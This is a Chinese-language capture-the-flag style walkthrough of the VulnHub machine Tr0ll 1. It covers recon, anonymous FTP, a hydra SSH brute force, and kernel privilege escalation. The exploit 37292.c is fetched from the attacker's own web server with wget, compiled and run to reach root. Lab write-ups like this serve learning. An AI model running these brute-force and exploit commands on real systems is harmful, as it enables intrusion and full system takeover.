靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/
信息收集
我们可以在上面看到Nmap找到开放的端口21、22、80
Anonymous FTP login allowed
//允许匿名FTP登录
用户名:Anonymous
密码为空
其中暴露的robots.txt
和/secret
目录
攻击
根据Nmap的结果 进行攻击
pcap后缀的文件 盲猜是流量分析
将文件下载到本地使用Wireshark打开查看
耶 有收获 发现一个目录
进行访问 目录
继续浏览/secret
啊这 就这啊
尝试着打开/sup3rs3cr3tdirlol
目录
下载下来
file roflmao //检查文件类型
它是32位ELF可执行文件,使用strings字符串对其执行一些静态分析
Find address 0x0856BF to proceed
意思是找到地址0x0856BF
上面应该是用户名 下面是密码
将用户名文件下载下来
ok
上神器九头蛇 破解一下
hydra -L which_one_lol.txt -p Pass.txt 192.168.120.131 ssh
ssh登陆查看信息
知道了靶机的版本 看有没有 漏洞
提权
在exploit官网查看可以使用37292
进行提权
之前 用过了 所以我就拿出来继续打
使用python创建一个服务
python -m SimpleHTTPServer 5555
通过服务上传37292.c到靶机中
使用python获得的shell权限后,得使用ptyhon获得tty,使用
python -c 'import pty; pty.spawn("/bin/bash")'
轻车熟路的打一套组合拳 爽
这台靶机你们会遇到登陆ssh overflow@192.168.145.149后会2分钟就自动断开会话超时,然后得重新连接 我淦 贼烦 我刚开始以为是自己的问题
会话自动断开,原因可能是设置了计划任务
先 来 get一波 手速 快速打一波
python -c 'import pty; pty.spawn("/bin/bash")'
cd /tmp
wget 192.168.120.130:5555/37292.c
gcc 37292.c -o kk
./kk
id
cd /root
ls
cat proof.txt
还有一种 其他的提权方法 。。。 没看懂 就不写了
参考博客:https://blog.csdn.net/qq_34801745/article/details/103764969